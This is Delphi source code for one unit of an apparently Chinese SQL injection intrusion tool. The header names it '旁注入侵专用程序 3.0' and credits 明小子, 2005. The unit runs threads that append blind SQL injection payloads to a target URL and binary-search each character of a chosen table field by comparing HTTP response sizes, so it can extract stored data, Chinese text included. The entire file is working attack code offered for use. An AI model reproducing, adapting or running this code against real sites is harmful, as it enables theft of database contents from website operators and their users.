📄 scancontent.pas
字号:
{##########################################
旁注入侵专用程序 3.0升级版
----------------------------------------
模块:SQL注入检测 - 检测字段内容
描述:该单元为检测字段内容的多线程单元
作者:2005.3.20日下午 明小子
更新:2005.4.14日凌晨更新
##########################################}
unit ScanContent;
interface
uses
Classes, GetHttpSize, SysUtils, StdCtrls, Windows, Dialogs;
type
MyScanContent = class(TThread)
private
ContentInt, OutTextInt, OutTime: integer;
ContentStr: string;
ForNum, And1: integer;
TableName, FieldName: string;
SqlUrl: TComboBox;
Tmpcn1, Min, Max: integer;
TmpHanzi1, TmpHanzi2: byte;
TmpN: integer;
TmpID: string;
TmpBool: Boolean;
procedure UpDataStr;
procedure hanzi;
protected
procedure Execute; override;
public
constructor Create(Num, TmpAnd1: integer; URL: TComboBox; Table, Field: string; Bool: Boolean; ID: string);
end;
implementation
uses MainUnit;
constructor MyScanContent.Create(Num, TmpAnd1: integer; URL: TComboBox; Table, Field: string; Bool: Boolean; ID: string);
begin
TableName := Table;
FieldName := Field;
TmpBool := Bool;
TmpID := ID;
ForNum := Num;
and1 := TmpAnd1;
SqlUrl := Url;
FreeonTerminate := True;
inherited Create(False);
end;
procedure MyScanContent.UpDataStr;
begin
MainForm.GuessLsv.Items[ForNum - 1].SubItems.Text := Chr(OutTextInt);
end;
procedure MyScanContent.hanzi;
begin
MainForm.GuessLsv.Items[ForNum - 1].SubItems.Text := char(TmpHanzi1) + char(TmpHanzi2);
end;
procedure MyScanContent.Execute;
function SQLStr(Min, Max: Integer): string;
begin
if TmpBool then
Result := SqlUrl.Text + '%20and%20(select%20top%20' + TmpID + '%20asc(mid(cstr(' + FieldName + '),' + IntToStr(ForNum) + ',1))%20from%20(Select%20Top%20' + TmpID + '%20[' + FieldName + ']%20from%20[' + TableName + ']%20where%201=1%20order%20by%20[' + FieldName + '])%20T%20Order%20by%20[' + FieldName + ']%20desc)%20between%20' + inttostr(Min) + '%20and%20' + inttostr(Max)
else
Result := SqlUrl.Text + '%20and%20exists(select%20*%20from%20' + TableName + '%20where%201=1%20and%20' + 'unicode(substring(' + FieldName + ',' + inttostr(ForNum) + ',1))%20between%20' + inttostr(Min) + '%20and%20' + inttostr(Max) + '%20and%20id=(Select%20max(id)%20From%20' + TableName + '%20where%20id%20in%20(select%20top%20' + TmpID + '%20id%20from%20' + TableName + '%20Order%20by%20id)))';
end;
procedure ForProc(Min, Max: integer);
var
N: integer;
begin
for N := Min to Max do
begin
if Terminated then Exit;
ContentInt := Get_HttpSize(SQLStr(N, N), OutTime);
if ContentInt >= and1 then
begin
OutTextInt := N;
SynChronize(UpDataStr);
Break;
end;
end;
end;
var
TmpMin, TmpMax, N: integer;
nmh, nml: byte;
cn1: integer; //转汉字循环
cn2: word; //转汉字
begin
try
OutTime := 60000;
{***************************************************************
* 如果30 to 130正确,那么猜30到130之间的字符.否则直接猜汉字 *
****************************************************************}
ContentInt := Get_HttpSize(SQLStr(30, 130), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 79), OutTime);
if ContentInt >= and1 then
begin
{如果猜30 to 79等于真,那么继续猜30 to 54, 否则猜80 to 130之间的字符!}
ContentInt := Get_HttpSize(SQLStr(30, 54), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 42), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 36), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(30, 32), OutTime);
if ContentInt >= and1 then
ForProc(30, 32)
else
ForProc(33, 36);
end
else {如果30 to 36是错的,那么表示在他 37 到 42之间,直接猜37 to 39}
begin
ContentInt := Get_HttpSize(SQLStr(37, 39), OutTime);
if ContentInt >= and1 then
ForProc(37, 39)
else
ForProc(40, 42);
end;
end
else {如果30 to 42是错的,那么猜43 to 54,直接从43 to 47猜,一会再猜48到54}
begin
ContentInt := Get_HttpSize(SQLStr(43, 47), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(43, 45), OutTime);
if ContentInt >= and1 then
ForProc(43, 45)
else
ForProc(46, 47);
end
else {如果43 to 47是错的,那么表示它在48到54之间,直接从48到50开始猜起}
begin
ContentInt := Get_HttpSize(SQLStr(48, 50), OutTime);
if ContentInt >= and1 then
ForProc(48, 50)
else
ForProc(51, 54);
end;
end;
end
else {如果不对,那么表示它在55 到 79之间, 直接从55 到 67 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(55, 67), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(55, 61), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(55, 58), OutTime);
if ContentInt >= and1 then
ForProc(55, 58)
else
ForProc(59, 61);
end
else {如果55 to 61是错的,那么表示它在62 到 67之间,直接从62 到 64 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(62, 64), OutTime);
if ContentInt >= and1 then
ForProc(62, 64)
else
ForProc(65, 67);
end;
end
else {如果55 to 67是错的,那么表示它在68 到 79之间,直接从68 to 73开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(68, 73), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(68, 70), OutTime);
if ContentInt >= and1 then
ForProc(68, 70)
else
ForProc(71, 73);
end
else {如果68 to 73是错的,那么表示它在74 到 79之间,直接从74 to 76开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(74, 76), OutTime);
if ContentInt >= and1 then
ForProc(74, 76)
else
ForProc(77, 79);
end;
end;
end;
end
else {如果30 到 79 := 假, 那么猜80 到 130, 直接从 80 到 105 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(80, 105), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(80, 92), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(80, 86), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(80, 82), OutTime);
if ContentInt >= and1 then
ForProc(80, 82)
else
ForProc(83, 86);
end
else {如果80 to 86 = 假,那么猜 87 to 92, 直接从 87 到 89 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(87, 89), OutTime);
if ContentInt >= and1 then
ForProc(87, 89)
else
ForProc(90, 92);
end;
end
else {如果80 to 92 = 假,那么猜 93 to 105, 直接从 93 到 99 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(93, 99), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(93, 95), OutTime);
if ContentInt >= and1 then
ForProc(93, 95)
else
ForProc(96, 99);
end
else {如果93 to 99 = 假,那么猜 100 to 105, 直接从 100 到 102 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(100, 102), OutTime);
if ContentInt >= and1 then
ForProc(100, 102)
else
ForProc(103, 105);
end;
end;
end
else {如果80 到 105 := 假, 那么猜106 到 130, 直接从 106 到 118 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(106, 118), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(106, 111), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(106, 108), OutTime);
if ContentInt >= and1 then
ForProc(106, 108)
else
ForProc(109, 111);
end
else {如果106 到 111 := 假, 那么猜112 到 118, 直接从 112 到 115 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(112, 115), OutTime);
if ContentInt >= and1 then
ForProc(112, 115)
else
ForProc(116, 118);
end;
end
else {如果106 到 118 := 假, 那么猜119 到 130, 直接从 119 到 124 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(119, 124), OutTime);
if ContentInt >= and1 then
begin
ContentInt := Get_HttpSize(SQLStr(119, 121), OutTime);
if ContentInt >= and1 then
ForProc(119, 121)
else
ForProc(122, 124);
end
else {如果119到 124 := 假, 那么猜125 到 130, 直接从 125 到 127 开始猜}
begin
ContentInt := Get_HttpSize(SQLStr(125, 127), OutTime);
if ContentInt >= and1 then
ForProc(125, 127)
else
ForProc(128, 130);
end;
end;
end;
end;
end
else
begin
{* * * * * * * * * * * * * * * * * *
猜 解 汉 字
* * * * * * * * * * * * * * * * * *}
Min := -10000;
Max := -15000;
while (Max - Min) < -2 do
begin
if Terminated then Exit;
ContentInt := Get_HttpSize(SQLStr(Min, Max), OutTime);
if ContentInt >= and1 then
begin
TmpMax := Max; {得到上次Max的值}
Max := Trunc(((Max - Min) / 2)) + Min;
end
else
begin
TmpMin := Max; {得到上次Max的值}
Max := Trunc(((Max - Min) / 2)) + Max;
Min := TmpMin + -1;
end;
end;
ContentInt := Get_HttpSize(SQLStr(Min, Max), OutTime); {再判断一次}
if ContentInt < and1 then {如果不对}
begin
Min := Max + -1;
Max := TmpMax;
end;
for cn1 := Max to Min do
begin
if Terminated then Exit; {如果结束了就退出}
ContentInt := Get_HttpSize(SQLStr(cn1, cn1), OutTime); {再循环判断一次}
if ContentInt >= and1 then {如果猜对了}
begin
cn2 := cn1;
asm
mov ax,cn2
mov nmh,ah
mov nml,al {把十六进制数的高低字节赋给nmh,nml}
end;
TmpHanzi1 := nmh; {传递给全局变量}
TmpHanzi2 := nml;
Synchronize(Hanzi); {同步}
break;
end;
end;
end;
except
end;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -